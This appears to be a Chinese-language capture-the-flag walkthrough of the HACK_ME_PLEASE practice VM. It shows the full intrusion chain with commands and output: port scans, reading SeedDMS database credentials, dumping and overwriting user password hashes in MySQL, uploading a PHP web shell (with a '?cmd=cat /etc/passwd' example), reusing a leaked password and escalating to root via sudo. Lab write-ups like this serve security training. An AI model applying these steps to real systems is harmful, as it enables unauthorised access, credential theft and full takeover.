nmap -sP 10.80.56.0/24
主机:10.80.56.101
靶机:10.80.56.183
nmap -p- 10.80.56.183
PORT STATE SERVICE
80/tcp open http
3306/tcp open mysql
33060/tcp open mysqlx
nmap -A -n 80 10.80.56.183
nmap -A -n 3306 10.80.56.183
nmap -A -n 33060 10.80.56.183
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Welcome to the land of pwnland
|_http-server-header: Apache/2.4.41 (Ubuntu)
3306/tcp open mysql MySQL 8.0.25-0ubuntu0.20.04.1
| ssl-cert: Subject: commonName=MySQL_Server_8.0.25_Auto_Generated_Server_Certificate
| Not valid before: 2021-07-03T00:33:15
|_Not valid after: 2031-07-01T00:33:15
|_ssl-date: TLS randomness does not represent time
| mysql-info:
| Protocol: 10
| Version: 8.0.25-0ubuntu0.20.04.1
| Thread ID: 10
| Capabilities flags: 65535
| Some Capabilities: ODBCClient, SwitchToSSLAfterHandshake, LongPassword, Speaks41ProtocolNew, ConnectWithDatabase, Support41Auth, SupportsTransactions, SupportsCompression, DontAllowDatabaseTableColumn, InteractiveClient, LongColumnFlag, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, FoundRows, IgnoreSigpipes, Speaks41ProtocolOld, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: \x0D\x13V\x1D\x14\x18\x10\x064\x18\x03l\x11\x7F(Dl\x1C\x02\x01
|_ Auth Plugin Name: caching_sha2_password
http://10.80.56.183
<!--
Moonlight Template
https://templatemo.com/tm-512-moonlight
-->
dirb http://10.80.56.183
#获取图片
http://10.80.56.183/img/aa
#查看发现OpenPGP Public Key,查阅发现是非对称加密,常用于邮件,好像没有用
zsteg aa.png
meta Software .. text: "Adobe ImageReady"
meta XML:com.adobe.xmp.. file: Unicode text, UTF-8 text, with very long lines (782), with no line terminators
00000000: 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d |<?xpacket begin=|
00000010: 22 feff 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 |"." id="W5M0MpCe|
00000020: 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 |hiHzreSzNTczkc9d|
00000030: 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 |"?> <x:xmpmeta x|
00000040: 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 |mlns:x="adobe:ns|
00000050: 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d |:meta/" x:xmptk=|
00000060: 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 |"Adobe XMP Core |
00000070: 35 2e 36 2d 63 30 36 37 20 37 39 2e 31 35 37 37 |5.6-c067 79.1577|
00000080: 34 37 2c 20 32 30 31 35 2f 30 33 2f 33 30 2d 32 |47, 2015/03/30-2|
00000090: 33 3a 34 30 3a 34 32 20 20 20 20 20 20 20 20 22 |3:40:42 "|
000000a0: 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d 6c 6e 73 |> <rdf:RDF xmlns|
000000b0: 3a 72 64 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 |:rdf="http://www|
000000c0: 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 30 32 2f |.w3.org/1999/02/|
000000d0: 32 32 2d 72 64 66 2d 73 79 6e 74 61 78 2d 6e 73 |22-rdf-syntax-ns|
000000e0: 23 22 3e 20 3c 72 64 66 3a 44 65 73 63 72 69 70 |#"> <rdf:Descrip|
000000f0: 74 69 6f 6e 20 72 64 66 3a 61 62 6f 75 74 3d 22 |tion rdf:about="|
b1,r,lsb,xy .. text: "J7[z{%^nD"
b2,abgr,lsb,xy .. text: "*62?11.0000/."
b2,abgr,msb,xy .. file: OpenPGP Secret Key
b3,abgr,msb,xy .. file: OpenPGP Public Key
b4,r,lsb,xy .. file: OpenPGP Public Key
b4,b,lsb,xy .. text: "eCC$B33233\""
b4,bgr,msb,xy .. text: "Wwu_wuWwu"
b4,rgba,lsb,xy .. text: "PP@/0`@_0N @@@@. -0,0"
b4,abgr,msb,xy .. text: "@' @G"
#那就只能从前端代码入手了
http://10.80.56.183/js/main.js
// give active class to first link
//make sure this js file is same as installed app on our server endpoint: /seeddms51x/seeddms-5.1.22/
$($('nav a')[0]).addClass('active');
#发现后台界面
http://10.80.56.183/seeddms51x/seeddms-5.1.22/
#查询用漏洞发现存在RCE,但是都绕不过登录
searchsploit seeddms
------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------- ---------------------------------
Seeddms 5.1.10 - Remote Command Execution (RCE) (Authenticated) | php/webapps/50062.py
SeedDMS 5.1.18 - Persistent Cross-Site Scripting | php/webapps/48324.txt
SeedDMS < 5.1.11 - 'out.GroupMgr.php' Cross-Site Scripting | php/webapps/47024.txt
SeedDMS < 5.1.11 - 'out.UsrMgr.php' Cross-Site Scripting | php/webapps/47023.txt
SeedDMS versions < 5.1.11 - Remote Command Execution | php/webapps/47022.txt
------------------------------------------------------------------------- ---------------------------------
#最后查阅题解,发现这个seeddms在conf目录下的settings.xml存在数据库信息
<database dbDriver="mysql" dbHostname="localhost" dbDatabase="seeddms" dbUser="seeddms" dbPass="seeddms" doNotCheckVersion="false"> </database>
#登录数据库
mysql -h 10.80.56.183 -useeddms -pseeddms
#user表
+-------------+---------------------+--------------------+-----------------+
| Employee_id | Employee_first_name | Employee_last_name | Employee_passwd |
+-------------+---------------------+--------------------+-----------------+
| 1 | saket | saurav | Saket@#$1337 |
+-------------+---------------------+--------------------+-----------------+
#tblUsers表
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+
| id | login | pwd | fullName | email | language | theme | comment | role | hidden | pwdExpiration | loginfailures | disabled | quota | homefolder |
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+
| 1 | admin | f9ef2c539bad8a6d2f3432b6d49ab51a | Administrator | address@server.com | en_GB | | | 1 | 0 | 2021-07-13 00:12:25 | 0 | 0 | 0 | NULL |
| 2 | guest | NULL | Guest User | NULL | | | | 2 | 0 | NULL | 0 | 0 | 0 | NULL |
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+
#尝试破解md5,但是失败,直接更新数据库,密码为123456的md5加密
UPDATE tblUsers SET pwd='e10adc3949ba59abbe56e057f20f883e' where id=1;
#登录后台成功,查看47022.txt,发现存在文件上传,且通过data/1048576/docunment_id/1.php,可以访问
cat 47022.txt
Step 3: Now after uploading the file check the document id corresponding to the document.
Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.
#按照格式上传1.php的反弹shell脚本
http://10.80.56.183/seeddms51x/data/1048576/11/1.php
#切换交互式界面
python3 -c "import pty;pty.spawn('/bin/bash')"
#进入/home目录发现用户saket
saket@ubuntu:/home$ ls
ls
saket
#结合上面数据库信息,切换用户
su saket
#查看权限大小,发现是root
sudo -l
#提权,通关
sudo su
cd /root
HACK_ME_PLEASE靶机渗透记录
最新推荐文章于 2024-05-14 11:00:23 发布